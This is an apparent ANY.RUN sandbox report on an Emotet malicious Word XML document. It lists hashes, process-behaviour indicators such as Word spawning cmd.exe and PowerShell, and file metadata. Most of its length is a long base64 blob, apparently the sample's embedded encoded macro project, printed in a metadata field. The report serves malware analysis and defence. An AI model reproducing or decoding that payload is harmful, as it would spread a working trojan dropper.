analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

2019-01

Full analysis: https://app.any.run/tasks/cf39a3f5-4730-41f0-b5ca-8dffb566844e
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: January 22, 2019, 22:04:18
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
emotet-doc
emotet
Indicators:
MIME: text/xml
File info: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
MD5:

F4BAE2AE6AC61C0C669A44D0C4531C3C

SHA1:

D1344BB4955F4D83626439F2C89230026A1C9A29

SHA256:

A97830126F063CC663FDAF187D2162231D79E1B256CB9AAB19FF3A71BBCEA1AA

SSDEEP:

3072:7kZ2tiOgmunCTcfjL/xSu90OoiLuDKZXfwKeljR1z:7kgNuCTcfxUOmD+XfwLX

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 3188)
    • Runs app for hidden code execution

      • cmd.exe (PID: 2656)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2788)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2624)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2624)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • MSOXMLED.EXE (PID: 2984)
    • Creates files in the user directory

      • powershell.exe (PID: 3188)
    • Application launched itself

      • cmd.exe (PID: 2656)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 4060)
      • cmd.exe (PID: 2656)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2624)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2624)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xml | Microsoft Office XML Flat File Format Word Document (ASCII) (60.1)
.xml | Microsoft Office XML Flat File Format (ASCII) (28.6)
.xaml | Microsoft Extensible Application Markup Language (7.7)
.xml | Generic XML (ASCII) (2.1)
.html | HyperText Markup Language (1.2)

EXIF

XMP

WordDocumentBodySectSectPrDocGridLine-pitch: 360
WordDocumentBodySectSectPrColsSpace: 720
WordDocumentBodySectSectPrPgMarGutter: -
WordDocumentBodySectSectPrPgMarFooter: 720
WordDocumentBodySectSectPrPgMarHeader: 720
WordDocumentBodySectSectPrPgMarLeft: 1440
WordDocumentBodySectSectPrPgMarBottom: 1440
WordDocumentBodySectSectPrPgMarRight: 1440
WordDocumentBodySectSectPrPgMarTop: 1440
WordDocumentBodySectSectPrPgSzH: 15840
WordDocumentBodySectSectPrPgSzW: 12240
WordDocumentBodySectSectPrRsidR: 005E6EE1
WordDocumentBodySectPRPictShapeImagedataTitle: -
WordDocumentBodySectPRPictShapeImagedataSrc: wordml://02000001.jpg
WordDocumentBodySectPRPictShapeStyle: width:468pt;height:349.5pt;visibility:visible;mso-wrap-style:square
WordDocumentBodySectPRPictShapeType: #_x0000_t75
WordDocumentBodySectPRPictShapeSpid: _x0000_i1025
WordDocumentBodySectPRPictShapeId: Picture 1
WordDocumentBodySectPRPictBinData: (Binary data 145376 bytes, use -b option to extract)
WordDocumentBodySectPRPictBinDataName: wordml://02000001.jpg
WordDocumentBodySectPRPictShapetypeLockAspectratio: t
WordDocumentBodySectPRPictShapetypeLockExt: edit
WordDocumentBodySectPRPictShapetypePathConnecttype: rect
WordDocumentBodySectPRPictShapetypePathGradientshapeok: t
WordDocumentBodySectPRPictShapetypePathExtrusionok: f
WordDocumentBodySectPRPictShapetypeFormulasFEqn: if lineDrawn pixelLineWidth 0
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: miter
WordDocumentBodySectPRPictShapetypeStroked: f
WordDocumentBodySectPRPictShapetypeFilled: f
WordDocumentBodySectPRPictShapetypePath: m@4@5l@4@11@9@11@9@5xe
WordDocumentBodySectPRPictShapetypePreferrelative: t
WordDocumentBodySectPRPictShapetypeSpt: 75
WordDocumentBodySectPRPictShapetypeCoordsize: 21600,21600
WordDocumentBodySectPRPictShapetypeId: _x0000_t75
WordDocumentBodySectPRRPrNoProof: -
WordDocumentBodySectPRRsidRPr: 00F17EA2
WordDocumentBodySectPRsidRDefault: 00187F7A
WordDocumentBodySectPRsidR: 005E6EE1
WordDocumentDocPrRsidsRsidVal: 00187F7A
WordDocumentDocPrRsidsRsidRootVal: 005E6EE1
WordDocumentDocPrCompatDontGrowAutofit: -
WordDocumentDocPrCompatUseAsianBreakRules: -
WordDocumentDocPrCompatWrapTextWithPunct: -
WordDocumentDocPrCompatSnapToGridInCell: -
WordDocumentDocPrCompatBreakWrappedTables: -
WordDocumentDocPrAlwaysShowPlaceholderTextVal: off
WordDocumentDocPrIgnoreMixedContentVal: off
WordDocumentDocPrSaveInvalidXMLVal: off
WordDocumentDocPrValidateAgainstSchema: -
WordDocumentDocPrPixelsPerInchVal: 120
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile: -
WordDocumentDocPrOptimizeForBrowser: -
WordDocumentDocPrCharacterSpacingControlVal: DontCompress
WordDocumentDocPrPunctuationKerning: -
WordDocumentDocPrDefaultTabStopVal: 720
WordDocumentDocPrDoNotEmbedSystemFonts: -
WordDocumentDocPrRemovePersonalInformation: -
WordDocumentDocPrZoomPercent: 100
WordDocumentDocPrViewVal: print
WordDocumentShapeDefaultsShapelayoutIdmapData: 1
WordDocumentShapeDefaultsShapelayoutIdmapExt: edit
WordDocumentShapeDefaultsShapelayoutExt: edit
WordDocumentShapeDefaultsShapedefaultsSpidmax: 1026
WordDocumentShapeDefaultsShapedefaultsExt: edit
WordDocumentDocSuppDataBinData: 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 